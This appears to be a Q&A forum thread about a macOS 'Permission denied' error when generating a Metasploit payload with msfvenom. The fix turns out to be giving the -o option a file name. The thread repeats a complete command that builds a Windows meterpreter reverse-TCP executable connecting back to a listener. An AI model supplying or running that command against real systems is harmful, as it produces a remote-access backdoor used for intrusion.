# Generating a payload with 'msfvenom' gives "Permission denied" on macOS

Tags: bash, macos, terminal, permissions, metasploit

I am trying to create a metasploit payload using msfvenom with the following command:

`msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f exe -o /Users/<UserNameHere>/Desktop  > shell.exe`

But when that is executed I get: `-bash: shell.exe: Permission denied`

even though i tried running it with sudo and logging in as root with `dsenableroot`. I'm not sure what is wrong or where to look for an answer.

Answer (score 0):

Try:

```
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=3333 -f exe -o /Users/<UserNameHere>/Desktop/File.exe
```

Comment: i did try running it as sudo still same message : -bash: shell.exe: Permission denied

Comment: Well, if you're open to using 'sudo su', try running it that way. Just type 'sudo su', then the command you're trying to run.

Comment: same thing i typed in 'sudo su' and it gave me the same message, it doesn't even  prompt me for a password which is weird because i am running it as sudo.

Comment: Interesting.. I'll do a bit more research and tell you what I dig up.

Comment: Try: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.2 lport=3333 -f exe -o /Users/<UserNameHere>/Desktop. It might be because you're trying to pipe it.

Comment: Ok it works, but i get the following:
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Error: Is a directory @ rb_sysopen - /Users/usernamehere/Desktop
 
and i cant find the payload on my desktop

Comment: It's only because you have to specify a filename, (sorry). So use Desktop/File.exe

Comment: it works like a charm, thanks you made my day i've been working on this all day to the point of thinking of using a vm on my friends windows machine to create this. All the best to you